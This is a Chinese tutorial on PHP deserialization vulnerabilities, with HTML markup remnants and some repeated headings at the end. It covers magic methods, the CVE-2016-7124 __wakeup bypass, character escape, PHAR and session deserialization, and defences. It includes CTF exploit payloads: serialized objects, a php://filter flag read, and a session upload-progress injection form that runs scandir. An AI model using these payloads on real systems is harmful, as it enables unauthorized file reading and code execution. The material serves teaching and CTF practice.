PHP序列化与反序列化漏洞全面解析<\/h1>

一、基础概念<\/h2>

1. 序列化与反序列化简介<\/h3>

序列化是将数据转化为可逆数据结构的过程，反序列化则是将序列化字符串还原为原始对象的过程。PHP中使用：<\/p>

serialize()<\/code>：将对象格式化为有序字符串<\/li>

unserialize()<\/code>：将字符串还原为对象<\/li>
<\/ul>
主要用于数据传输和存储，如session缓存、cookie等。<\/p>
2. 序列化格式解析<\/h3>
$user =<\/span> array<\/span>('xiao'<\/span>,'shi'<\/span>,'zi'<\/span>);
<\/span><\/span>echo<\/span> serialize<\/span>($user);
<\/span><\/span>\/\/ 输出：a:3:{i:0;s:4:"xiao";i:1;s:3:"shi";i:2;s:2:"zi";}
<\/span><\/span><\/span><\/code><\/pre>格式说明：<\/p>

a:3<\/code>：数组，3个元素<\/li>
i:0<\/code>：整型索引0<\/li>
s:4:"xiao"<\/code>：字符串，长度4，值"xiao"<\/li>
<\/ul>
类序列化示例：<\/p>
class<\/span> test<\/span> {
<\/span><\/span>    public<\/span> $a =<\/span> "xiaoshizi"<\/span>;
<\/span><\/span>    public<\/span> $b =<\/span> "laoshizi"<\/span>;
<\/span><\/span>}
<\/span><\/span>\/\/ 输出：O:4:"test":2:{s:1:"a";s:9:"xiaoshizi";s:1:"b";s:8:"laoshizi";}
<\/span><\/span><\/span><\/code><\/pre>访问控制修饰符影响：<\/p>

protected：变量名前加\x00*\x00<\/code><\/li>
private：变量名前加\x00类名\x00<\/code><\/li>
<\/ul>
3. 关键魔术方法<\/h3>



方法<\/th>
触发时机<\/th>
<\/tr>
<\/thead>


__construct()<\/code><\/td>
对象实例化时<\/td>
<\/tr>

__wakeup()<\/code><\/td>
执行unserialize()前<\/td>
<\/tr>

__sleep()<\/code><\/td>
执行serialize()前<\/td>
<\/tr>

__destruct()<\/code><\/td>
对象销毁时<\/td>
<\/tr>

__toString()<\/code><\/td>
对象被当作字符串使用时<\/td>
<\/tr>

__invoke()<\/code><\/td>
对象被当作函数调用时<\/td>
<\/tr>
<\/tbody>
<\/table>
二、反序列化漏洞利用技术<\/h2>
1. PHP7.1+类属性不敏感<\/h3>
PHP7.1+对protected\/private属性不敏感，可省略\x00<\/code>前缀直接反序列化。<\/p>
例题：[网鼎杯2020青龙组]AreUSerialz<\/strong><\/p>

绕过is_valid()检查不可打印字符<\/li>
将protected改为public属性<\/li>
构造payload读取flag.php<\/li>
<\/ul>
class<\/span> FileHandler<\/span> {
<\/span><\/span>    public<\/span> $op =<\/span> 2<\/span>;
<\/span><\/span>    public<\/span> $filename =<\/span> "php:\/\/filter\/read=convert.base64-encode\/resource=flag.php"<\/span>;
<\/span><\/span>    public<\/span> $content;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 绕过__wakeup (CVE-2016-7124)<\/h3>
影响版本：<\/p>

PHP5 < 5.6.25<\/li>
PHP7 < 7.0.10<\/li>
<\/ul>
利用方式<\/strong>：序列化字符串中对象属性个数大于实际个数时跳过__wakeup执行。<\/p>
例题：[极客大挑战2019]PHP<\/strong><\/p>

发现备份文件www.zip<\/li>
构造payload绕过__wakeup<\/li>
修改属性数量为更大值<\/li>
<\/ol>
O<\/span>:<\/span>4<\/span>:<\/span>"Name"<\/span>:<\/span>3<\/span>:<\/span>{s<\/span>:<\/span>14<\/span>:<\/span>"%00Name%00username"<\/span>;s<\/span>:<\/span>5<\/span>:<\/span>"admin"<\/span>;s<\/span>:<\/span>14<\/span>:<\/span>"%00Name%00password"<\/span>;i<\/span>:<\/span>100<\/span>;}
<\/span><\/span><\/code><\/pre>3. 正则绕过技术<\/h3>

加号绕过<\/strong>：O:+4:"test"...<\/code><\/li>
数组包裹<\/strong>：serialize(array($a))<\/code><\/li>
16进制表示<\/strong>：S:4:"\00*\00\61"<\/code>代替s:4:"\x00*\x00a"<\/code><\/li>
引用绕过<\/strong>：使两个属性始终相等<\/li>
<\/ol>
4. 字符逃逸漏洞<\/h3>
当序列化后数据进行过滤替换时可能导致结构破坏。<\/p>
字符增多情况<\/h4>

计算需要逃逸的字符串长度<\/li>
构造足够数量的触发词使后续内容成为有效属性<\/li>
<\/ul>
字符减少情况<\/h4>

计算到下一个可控变量的距离<\/li>
构造payload使过滤后格式正确<\/li>
<\/ul>
例题：<\/strong><\/p>
\/\/ 过滤将Firebasky替换为更长的Firebaskyup
<\/span><\/span><\/span><\/span>FirebaskyFirebasky<\/span>...<\/span>";s:8:"<\/span>password<\/span>";s:5:"<\/span>yu22x<\/span>";}
<\/span><\/span><\/span><\/code><\/pre>三、对象注入漏洞<\/h2>
当unserialize参数可控且存在危险魔术方法时可能造成任意对象注入。<\/p>
利用条件<\/strong>：<\/p>

unserialize参数可控<\/li>
存在含危险魔术方法的类<\/li>
<\/ol>
四、PHAR反序列化<\/h2>
1. PHAR文件结构<\/h3>

stub<\/strong>：标识头，如<?php __HALT_COMPILER();?><\/code><\/li>
manifest<\/strong>：元数据，存储序列化信息<\/li>
contents<\/strong>：压缩内容<\/li>
signature<\/strong>：签名<\/li>
<\/ol>
2. 利用方法<\/h3>
$phar =<\/span> new<\/span> Phar<\/span>("test.phar"<\/span>);
<\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER();?>"<\/span>);
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($maliciousObj);
<\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span><\/code><\/pre>触发函数<\/strong>：<\/p>

file_exists()<\/li>
file_get_contents()<\/li>
各种文件处理函数<\/li>
<\/ul>
3. 绕过技术<\/h3>

改变协议<\/strong>：
compress.zlib:\/\/phar:\/\/
php:\/\/filter\/resource=phar:\/\/
<\/code><\/pre>
<\/li>
修改文件头<\/strong>：添加GIF\/PNG等文件头<\/li>
修改扩展名<\/strong>：伪装为其他格式文件<\/li>
<\/ol>
五、Session反序列化<\/h2>
1. 处理引擎差异<\/h3>



引擎<\/th>
存储格式<\/th>
<\/tr>
<\/thead>


php<\/td>
`键名<\/td>
<\/tr>

php_serialize<\/td>
序列化数组<\/code><\/td>
<\/tr>

php_binary<\/td>
长度+键名+序列化值<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>
2. 利用方式<\/h3>

使用php_serialize引擎存入|序列化payload<\/code><\/li>
php引擎会将|<\/code>后内容反序列化<\/li>
<\/ol>
3. session.upload_progress利用<\/h3>
通过文件上传进度机制注入session：<\/p>
<form<\/span> action<\/span>=<\/span>"target.php"<\/span> method<\/span>=<\/span>"POST"<\/span> enctype<\/span>=<\/span>"multipart\/form-data"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"PHP_SESSION_UPLOAD_PROGRESS"<\/span> value<\/span>=<\/span>"|序列化payload"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"file"<\/span> name<\/span>=<\/span>"file"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>例题：Jarvis OJ-PHPINFO<\/strong><\/p>

利用上传进度机制注入session<\/li>
构造payload读取目录和文件内容<\/li>
利用不同处理器差异触发反序列化<\/li>
<\/ol>
|<\/span>O<\/span>:<\/span>5<\/span>:<\/span>\<\/span>"OowoO<\/span>\"<\/span>:1:{s:4:<\/span>\"<\/span>mdzz<\/span>\"<\/span>;s:36:<\/span>\"<\/span>print_r(scandir(dirname(__FILE__)));<\/span>\"<\/span>;}
<\/span><\/span><\/span><\/code><\/pre>防御建议<\/h2>

不要反序列化不可信数据<\/li>
使用JSON等更安全的序列化格式<\/li>
严格检查反序列化输入<\/li>
限制危险魔术方法的使用<\/li>
保持PHP环境更新<\/li>
<\/ol>

PHP序列化与反序列化漏洞全面解析<\/h1>

一、基础概念<\/h2>

二、反序列化漏洞利用技术<\/h2>

4. 字符逃逸漏洞<\/h3> 当序列化后数据进行过滤替换时可能导致结构破坏。<\/p>

四、PHAR反序列化<\/h2>

五、Session反序列化<\/h2>

防御建议<\/h2> 不要反序列化不可信数据<\/li> 使用JSON等更安全的序列化格式<\/li> 严格检查反序列化输入<\/li> 限制危险魔术方法的使用<\/li> 保持PHP环境更新<\/li> <\/ol>

4. 字符逃逸漏洞<\/h3>
当序列化后数据进行过滤替换时可能导致结构破坏。<\/p>

防御建议<\/h2>

不要反序列化不可信数据<\/li>
使用JSON等更安全的序列化格式<\/li>
严格检查反序列化输入<\/li>
限制危险魔术方法的使用<\/li>
保持PHP环境更新<\/li> <\/ol>